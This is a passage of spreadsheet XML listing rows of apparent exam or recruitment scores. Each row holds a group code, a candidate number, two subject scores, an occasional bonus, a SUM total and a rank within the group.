    </row>
    <row r="477" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A477" s="9" t="n">
        <v>4300081</v>
      </c>
      <c r="B477" s="8" t="n">
        <v>1314011705</v>
      </c>
      <c r="C477" s="8" t="s">
        <v>142</v>
      </c>
      <c r="D477" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E477" s="8" t="n">
        <v>58.4</v>
      </c>
      <c r="F477" s="8" t="n">
        <v>67.6</v>
      </c>
      <c r="G477" s="8"/>
      <c r="H477" s="8" t="n">
        <f aca="false">SUM(E477:G477)</f>
        <v>126</v>
      </c>
      <c r="I477" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="478" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A478" s="9" t="n">
        <v>4300081</v>
      </c>
      <c r="B478" s="8" t="n">
        <v>1314011707</v>
      </c>
      <c r="C478" s="8" t="s">
        <v>142</v>
      </c>
      <c r="D478" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E478" s="8" t="n">
        <v>46.6</v>
      </c>
      <c r="F478" s="8" t="n">
        <v>54.2</v>
      </c>
      <c r="G478" s="8"/>
      <c r="H478" s="8" t="n">
        <f aca="false">SUM(E478:G478)</f>
        <v>100.8</v>
      </c>
      <c r="I478" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="479" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A479" s="9" t="n">
        <v>4300081</v>
      </c>
      <c r="B479" s="8" t="n">
        <v>1314011706</v>
      </c>
      <c r="C479" s="8" t="s">
        <v>142</v>
      </c>
      <c r="D479" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E479" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F479" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G479" s="8"/>
      <c r="H479" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I479" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="480" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A480" s="9" t="n">
        <v>4300082</v>
      </c>
      <c r="B480" s="8" t="n">
        <v>1314011710</v>
      </c>
      <c r="C480" s="8" t="s">
        <v>143</v>
      </c>
      <c r="D480" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E480" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="F480" s="8" t="n">
        <v>72.2</v>
      </c>
      <c r="G480" s="8"/>
      <c r="H480" s="8" t="n">
        <f aca="false">SUM(E480:G480)</f>
        <v>133</v>
      </c>
      <c r="I480" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="481" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A481" s="9" t="n">
        <v>4300082</v>
      </c>
      <c r="B481" s="8" t="n">
        <v>1314011714</v>
      </c>
      <c r="C481" s="8" t="s">
        <v>143</v>
      </c>
      <c r="D481" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E481" s="8" t="n">
        <v>58.4</v>
      </c>
      <c r="F481" s="8" t="n">
        <v>71.2</v>
      </c>
      <c r="G481" s="8"/>
      <c r="H481" s="8" t="n">
        <f aca="false">SUM(E481:G481)</f>
        <v>129.6</v>
      </c>
      <c r="I481" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="482" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A482" s="9" t="n">
        <v>4300082</v>
      </c>
      <c r="B482" s="8" t="n">
        <v>1314011713</v>
      </c>
      <c r="C482" s="8" t="s">
        <v>143</v>
      </c>
      <c r="D482" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E482" s="8" t="n">
        <v>59.2</v>
      </c>
      <c r="F482" s="8" t="n">
        <v>64.8</v>
      </c>
      <c r="G482" s="8"/>
      <c r="H482" s="8" t="n">
        <f aca="false">SUM(E482:G482)</f>
        <v>124</v>
      </c>
      <c r="I482" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="483" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A483" s="9" t="n">
        <v>4300082</v>
      </c>
      <c r="B483" s="8" t="n">
        <v>1314011708</v>
      </c>
      <c r="C483" s="8" t="s">
        <v>143</v>
      </c>
      <c r="D483" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E483" s="8" t="n">
        <v>55.2</v>
      </c>
      <c r="F483" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="G483" s="8"/>
      <c r="H483" s="8" t="n">
        <f aca="false">SUM(E483:G483)</f>
        <v>120.8</v>
      </c>
      <c r="I483" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="484" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A484" s="9" t="n">
        <v>4300082</v>
      </c>
      <c r="B484" s="8" t="n">
        <v>1314011711</v>
      </c>
      <c r="C484" s="8" t="s">
        <v>143</v>
      </c>
      <c r="D484" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E484" s="8" t="n">
        <v>55.4</v>
      </c>
      <c r="F484" s="8" t="n">
        <v>64</v>
      </c>
      <c r="G484" s="8"/>
      <c r="H484" s="8" t="n">
        <f aca="false">SUM(E484:G484)</f>
        <v>119.4</v>
      </c>
      <c r="I484" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="485" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A485" s="9" t="n">
        <v>4300082</v>
      </c>
      <c r="B485" s="8" t="n">
        <v>1314011712</v>
      </c>
      <c r="C485" s="8" t="s">
        <v>143</v>
      </c>
      <c r="D485" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E485" s="8" t="n">
        <v>49</v>
      </c>
      <c r="F485" s="8" t="n">
        <v>66.2</v>
      </c>
      <c r="G485" s="8"/>
      <c r="H485" s="8" t="n">
        <f aca="false">SUM(E485:G485)</f>
        <v>115.2</v>
      </c>
      <c r="I485" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="486" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A486" s="9" t="n">
        <v>4300082</v>
      </c>
      <c r="B486" s="8" t="n">
        <v>1314011709</v>
      </c>
      <c r="C486" s="8" t="s">
        <v>143</v>
      </c>
      <c r="D486" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E486" s="8" t="n">
        <v>53.2</v>
      </c>
      <c r="F486" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="G486" s="8"/>
      <c r="H486" s="8" t="n">
        <f aca="false">SUM(E486:G486)</f>
        <v>114</v>
      </c>
      <c r="I486" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="487" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A487" s="9" t="n">
        <v>4300083</v>
      </c>
      <c r="B487" s="8" t="n">
        <v>1314011717</v>
      </c>
      <c r="C487" s="8" t="s">
        <v>144</v>
      </c>
      <c r="D487" s="8" t="s">
        <v>145</v>
      </c>
      <c r="E487" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="F487" s="8" t="n">
        <v>70.2</v>
      </c>
      <c r="G487" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H487" s="8" t="n">
        <f aca="false">SUM(E487:G487)</f>
        <v>139.8</v>
      </c>
      <c r="I487" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="488" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A488" s="9" t="n">
        <v>4300083</v>
      </c>
      <c r="B488" s="8" t="n">
        <v>1314011715</v>
      </c>
      <c r="C488" s="8" t="s">
        <v>144</v>
      </c>
      <c r="D488" s="8" t="s">
        <v>145</v>
      </c>
      <c r="E488" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="F488" s="8" t="n">
        <v>70.4</v>
      </c>
      <c r="G488" s="8"/>
      <c r="H488" s="8" t="n">
        <f aca="false">SUM(E488:G488)</f>
        <v>133.2</v>
      </c>
      <c r="I488" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="489" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A489" s="9" t="n">
        <v>4300083</v>
      </c>
      <c r="B489" s="8" t="n">
        <v>1314011716</v>
      </c>
      <c r="C489" s="8" t="s">
        <v>144</v>
      </c>
      <c r="D489" s="8" t="s">
        <v>145</v>
      </c>
      <c r="E489" s="8" t="n">
        <v>57.4</v>
      </c>
      <c r="F489" s="8" t="n">
        <v>61.2</v>
      </c>
      <c r="G489" s="8"/>
      <c r="H489" s="8" t="n">
        <f aca="false">SUM(E489:G489)</f>
        <v>118.6</v>
      </c>
      <c r="I489" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="490" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A490" s="9" t="n">
        <v>4300084</v>
      </c>
      <c r="B490" s="8" t="n">
        <v>1314011727</v>
      </c>
      <c r="C490" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D490" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E490" s="8" t="n">
        <v>56.2</v>
      </c>
      <c r="F490" s="8" t="n">
        <v>74.2</v>
      </c>
      <c r="G490" s="8"/>
      <c r="H490" s="8" t="n">
        <f aca="false">SUM(E490:G490)</f>
        <v>130.4</v>
      </c>
      <c r="I490" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="491" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A491" s="9" t="n">
        <v>4300084</v>
      </c>
      <c r="B491" s="8" t="n">
        <v>1314011726</v>
      </c>
      <c r="C491" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D491" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E491" s="8" t="n">
        <v>52.8</v>
      </c>
      <c r="F491" s="8" t="n">
        <v>69.4</v>
      </c>
      <c r="G491" s="8"/>
      <c r="H491" s="8" t="n">
        <f aca="false">SUM(E491:G491)</f>
        <v>122.2</v>
      </c>
      <c r="I491" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="492" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A492" s="9" t="n">
        <v>4300084</v>
      </c>
      <c r="B492" s="8" t="n">
        <v>1314011723</v>
      </c>
      <c r="C492" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D492" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E492" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="F492" s="8" t="n">
        <v>61.8</v>
      </c>
      <c r="G492" s="8"/>
      <c r="H492" s="8" t="n">
        <f aca="false">SUM(E492:G492)</f>
        <v>116.6</v>
      </c>
      <c r="I492" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="493" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A493" s="9" t="n">
        <v>4300084</v>
      </c>
      <c r="B493" s="8" t="n">
        <v>1314011724</v>
      </c>
      <c r="C493" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D493" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E493" s="8" t="n">
        <v>54.4</v>
      </c>
      <c r="F493" s="8" t="n">
        <v>59.2</v>
      </c>
      <c r="G493" s="8"/>
      <c r="H493" s="8" t="n">
        <f aca="false">SUM(E493:G493)</f>
        <v>113.6</v>
      </c>
      <c r="I493" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="494" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A494" s="9" t="n">
        <v>4300084</v>
      </c>
      <c r="B494" s="8" t="n">
        <v>1314011719</v>
      </c>
      <c r="C494" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D494" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E494" s="8" t="n">
        <v>51.4</v>
      </c>
      <c r="F494" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="G494" s="8"/>
      <c r="H494" s="8" t="n">
        <f aca="false">SUM(E494:G494)</f>
        <v>113</v>
      </c>
      <c r="I494" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="495" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A495" s="9" t="n">
        <v>4300084</v>
      </c>
      <c r="B495" s="8" t="n">
        <v>1314011729</v>
      </c>
      <c r="C495" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D495" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E495" s="8" t="n">
        <v>54</v>
      </c>
      <c r="F495" s="8" t="n">
        <v>57.6</v>
      </c>
      <c r="G495" s="8"/>
      <c r="H495" s="8" t="n">
        <f aca="false">SUM(E495:G495)</f>
        <v>111.6</v>
      </c>
      <c r="I495" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="496" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A496" s="9" t="n">
        <v>4300084</v>
      </c>
      <c r="B496" s="8" t="n">
        <v>1314011718</v>
      </c>
      <c r="C496" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D496" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E496" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F496" s="8" t="n">
        <v>54</v>
      </c>
      <c r="G496" s="8"/>
      <c r="H496" s="8" t="n">
        <f aca="false">SUM(E496:G496)</f>
        <v>110.4</v>
      </c>
      <c r="I496" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="497" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A497" s="9" t="n">
        <v>4300084</v>
      </c>
      <c r="B497" s="8" t="n">
        <v>1314011721</v>
      </c>
      <c r="C497" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D497" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E497" s="8" t="n">
        <v>45</v>
      </c>
      <c r="F497" s="8" t="n">
        <v>62</v>
      </c>
      <c r="G497" s="8"/>
      <c r="H497" s="8" t="n">
        <f aca="false">SUM(E497:G497)</f>
        <v>107</v>
      </c>
      <c r="I497" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="498" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A498" s="9" t="n">
        <v>4300084</v>
      </c>
      <c r="B498" s="8" t="n">
        <v>1314011725</v>
      </c>
      <c r="C498" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D498" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E498" s="8" t="n">
        <v>51.8</v>
      </c>
      <c r="F498" s="8" t="n">
        <v>55</v>
      </c>
      <c r="G498" s="8"/>
      <c r="H498" s="8" t="n">
        <f aca="false">SUM(E498:G498)</f>
        <v>106.8</v>
      </c>
      <c r="I498" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="499" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A499" s="9" t="n">
        <v>4300084</v>
      </c>
      <c r="B499" s="8" t="n">
        <v>1314011722</v>
      </c>
      <c r="C499" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D499" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E499" s="8" t="n">
        <v>47.8</v>
      </c>
      <c r="F499" s="8" t="n">
        <v>54.4</v>
      </c>
      <c r="G499" s="8"/>
      <c r="H499" s="8" t="n">
        <f aca="false">SUM(E499:G499)</f>
        <v>102.2</v>
      </c>
      <c r="I499" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="500" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A500" s="9" t="n">
        <v>4300084</v>
      </c>
      <c r="B500" s="8" t="n">
        <v>1314011720</v>
      </c>
      <c r="C500" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D500" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E500" s="8" t="n">
        <v>49.6</v>
      </c>
      <c r="F500" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G500" s="8"/>
      <c r="H500" s="8" t="n">
        <v>49.6</v>
      </c>
      <c r="I500" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="501" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A501" s="9" t="n">
        <v>4300084</v>
      </c>
      <c r="B501" s="8" t="n">
        <v>1314011728</v>
      </c>
      <c r="C501" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D501" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E501" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F501" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G501" s="8"/>
      <c r="H501" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I501" s="8" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="502" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A502" s="9" t="n">
        <v>4300085</v>
      </c>
      <c r="B502" s="8" t="n">
        <v>1314011804</v>
      </c>
      <c r="C502" s="8" t="s">
        <v>147</v>
      </c>
      <c r="D502" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E502" s="8" t="n">
        <v>68.6</v>
      </c>
      <c r="F502" s="8" t="n">
        <v>76</v>
      </c>
      <c r="G502" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H502" s="8" t="n">
        <f aca="false">SUM(E502:G502)</f>
        <v>149.6</v>
      </c>
      <c r="I502" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="503" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A503" s="9" t="n">
        <v>4300085</v>
      </c>
      <c r="B503" s="8" t="n">
        <v>1314011802</v>
      </c>
      <c r="C503" s="8" t="s">
        <v>147</v>
      </c>
      <c r="D503" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E503" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="F503" s="8" t="n">
        <v>75.4</v>
      </c>
      <c r="G503" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H503" s="8" t="n">
        <f aca="false">SUM(E503:G503)</f>
        <v>139.2</v>
      </c>
      <c r="I503" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="504" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A504" s="9" t="n">
        <v>4300085</v>
      </c>
      <c r="B504" s="8" t="n">
        <v>1314011803</v>
      </c>
      <c r="C504" s="8" t="s">
        <v>147</v>
      </c>
      <c r="D504" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E504" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="F504" s="8" t="n">
        <v>69.6</v>
      </c>
      <c r="G504" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H504" s="8" t="n">
        <f aca="false">SUM(E504:G504)</f>
        <v>136.2</v>
      </c>
      <c r="I504" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="505" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A505" s="9" t="n">
        <v>4300085</v>
      </c>
      <c r="B505" s="8" t="n">
        <v>1314011801</v>
      </c>
      <c r="C505" s="8" t="s">
        <v>147</v>
      </c>
      <c r="D505" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E505" s="8" t="n">
        <v>55.2</v>
      </c>
      <c r="F505" s="8" t="n">
        <v>70.4</v>
      </c>
      <c r="G505" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H505" s="8" t="n">
        <f aca="false">SUM(E505:G505)</f>
        <v>128.6</v>
      </c>
      <c r="I505" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="506" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A506" s="9" t="n">
        <v>4300085</v>
      </c>
      <c r="B506" s="8" t="n">
        <v>1314011730</v>
      </c>
      <c r="C506" s="8" t="s">
        <v>147</v>
      </c>
      <c r="D506" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E506" s="8" t="n">
        <v>51.6</v>
      </c>
      <c r="F506" s="8" t="n">
        <v>63.2</v>
      </c>
      <c r="G506" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H506" s="8" t="n">
        <f aca="false">SUM(E506:G506)</f>
        <v>117.8</v>
      </c>
      <c r="I506" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="507" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A507" s="9" t="n">
        <v>4300086</v>
      </c>
      <c r="B507" s="8" t="n">
        <v>1314011809</v>
      </c>
      <c r="C507" s="8" t="s">
        <v>148</v>
      </c>
      <c r="D507" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E507" s="8" t="n">
        <v>61.2</v>
      </c>
      <c r="F507" s="8" t="n">
        <v>73</v>
      </c>
      <c r="G507" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H507" s="8" t="n">
        <f aca="false">SUM(E507:G507)</f>
        <v>137.2</v>
      </c>
      <c r="I507" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="508" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A508" s="9" t="n">
        <v>4300086</v>
      </c>
      <c r="B508" s="8" t="n">
        <v>1314011810</v>
      </c>
      <c r="C508" s="8" t="s">
        <v>148</v>
      </c>
      <c r="D508" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E508" s="8" t="n">
        <v>65</v>
      </c>
      <c r="F508" s="8" t="n">
        <v>71.6</v>
      </c>
      <c r="G508" s="8"/>
      <c r="H508" s="8" t="n">
        <f aca="false">SUM(E508:G508)</f>
        <v>136.6</v>
      </c>
      <c r="I508" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="509" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A509" s="9" t="n">
        <v>4300086</v>
      </c>
      <c r="B509" s="8" t="n">
        <v>1314011811</v>
      </c>
      <c r="C509" s="8" t="s">
        <v>148</v>
      </c>
      <c r="D509" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E509" s="8" t="n">
        <v>59</v>
      </c>
      <c r="F509" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="G509" s="8"/>
      <c r="H509" s="8" t="n">
        <f aca="false">SUM(E509:G509)</f>
        <v>125.6</v>
      </c>
      <c r="I509" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="510" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A510" s="9" t="n">
        <v>4300086</v>
      </c>
      <c r="B510" s="8" t="n">
        <v>1314011805</v>
      </c>
      <c r="C510" s="8" t="s">
        <v>148</v>
      </c>
      <c r="D510" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E510" s="8" t="n">
        <v>57.2</v>
      </c>
      <c r="F510" s="8" t="n">
        <v>64</v>
      </c>
      <c r="G510" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H510" s="8" t="n">
        <f aca="false">SUM(E510:G510)</f>
        <v>124.2</v>
      </c>
      <c r="I510" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="511" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A511" s="9" t="n">
        <v>4300086</v>
      </c>
      <c r="B511" s="8" t="n">
        <v>1314011812</v>
      </c>
      <c r="C511" s="8" t="s">
        <v>148</v>
      </c>
      <c r="D511" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E511" s="8" t="n">
        <v>53.6</v>
      </c>
      <c r="F511" s="8" t="n">
        <v>67</v>
      </c>
      <c r="G511" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H511" s="8" t="n">
        <f aca="false">SUM(E511:G511)</f>
        <v>123.6</v>
      </c>
      <c r="I511" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="512" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A512" s="9" t="n">
        <v>4300086</v>
      </c>
      <c r="B512" s="8" t="n">
        <v>1314011806</v>
      </c>
      <c r="C512" s="8" t="s">
        <v>148</v>
      </c>
      <c r="D512" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E512" s="8" t="n">
        <v>47.8</v>
      </c>
      <c r="F512" s="8" t="n">
        <v>66</v>
      </c>
      <c r="G512" s="8"/>
      <c r="H512" s="8" t="n">
        <f aca="false">SUM(E512:G512)</f>
        <v>113.8</v>
      </c>
      <c r="I512" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="513" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A513" s="9" t="n">
        <v>4300086</v>
      </c>
      <c r="B513" s="8" t="n">
        <v>1314011808</v>
      </c>
      <c r="C513" s="8" t="s">
        <v>148</v>
      </c>
      <c r="D513" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E513" s="8" t="n">
        <v>48.6</v>
      </c>
      <c r="F513" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="G513" s="8"/>
      <c r="H513" s="8" t="n">
        <f aca="false">SUM(E513:G513)</f>
        <v>111</v>
      </c>
      <c r="I513" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="514" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A514" s="9" t="n">
        <v>4300086</v>
      </c>
      <c r="B514" s="8" t="n">
        <v>1314011807</v>
      </c>
      <c r="C514" s="8" t="s">
        <v>148</v>
      </c>
      <c r="D514" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E514" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F514" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G514" s="8"/>
      <c r="H514" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I514" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="515" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A515" s="8" t="n">
        <v>4300088</v>
      </c>
      <c r="B515" s="8" t="n">
        <v>1314011814</v>
      </c>
      <c r="C515" s="8" t="s">
        <v>149</v>
      </c>
      <c r="D515" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E515" s="8" t="n">
        <v>67</v>
      </c>
      <c r="F515" s="8" t="n">
        <v>75.2</v>
      </c>
      <c r="G515" s="8"/>
      <c r="H515" s="8" t="n">
        <f aca="false">SUM(E515:G515)</f>
        <v>142.2</v>
      </c>
      <c r="I515" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="516" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A516" s="8" t="n">
        <v>4300088</v>
      </c>
      <c r="B516" s="8" t="n">
        <v>1314011818</v>
      </c>
      <c r="C516" s="8" t="s">
        <v>149</v>
      </c>
      <c r="D516" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E516" s="8" t="n">
        <v>63</v>
      </c>
      <c r="F516" s="8" t="n">
        <v>72</v>
      </c>
      <c r="G516" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H516" s="8" t="n">
        <f aca="false">SUM(E516:G516)</f>
        <v>138</v>
      </c>
      <c r="I516" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="517" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A517" s="8" t="n">
        <v>4300088</v>
      </c>
      <c r="B517" s="8" t="n">
        <v>1314011817</v>
      </c>
      <c r="C517" s="8" t="s">
        <v>149</v>
      </c>
      <c r="D517" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E517" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="F517" s="8" t="n">
        <v>66.8</v>
      </c>
      <c r="G517" s="8"/>
      <c r="H517" s="8" t="n">
        <f aca="false">SUM(E517:G517)</f>
        <v>129.2</v>
      </c>
      <c r="I517" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="518" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A518" s="8" t="n">
        <v>4300088</v>
      </c>
      <c r="B518" s="8" t="n">
        <v>1314011816</v>
      </c>
      <c r="C518" s="8" t="s">
        <v>149</v>
      </c>
      <c r="D518" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E518" s="8" t="n">
        <v>49.2</v>
      </c>
      <c r="F518" s="8" t="n">
        <v>60</v>
      </c>
      <c r="G518" s="8"/>
      <c r="H518" s="8" t="n">
        <f aca="false">SUM(E518:G518)</f>
        <v>109.2</v>
      </c>
      <c r="I518" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="519" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A519" s="8" t="n">
        <v>4300088</v>
      </c>
      <c r="B519" s="8" t="n">
        <v>1314011813</v>
      </c>
      <c r="C519" s="8" t="s">
        <v>150</v>
      </c>
      <c r="D519" s="8" t="s">
        <v>133</v>
      </c>
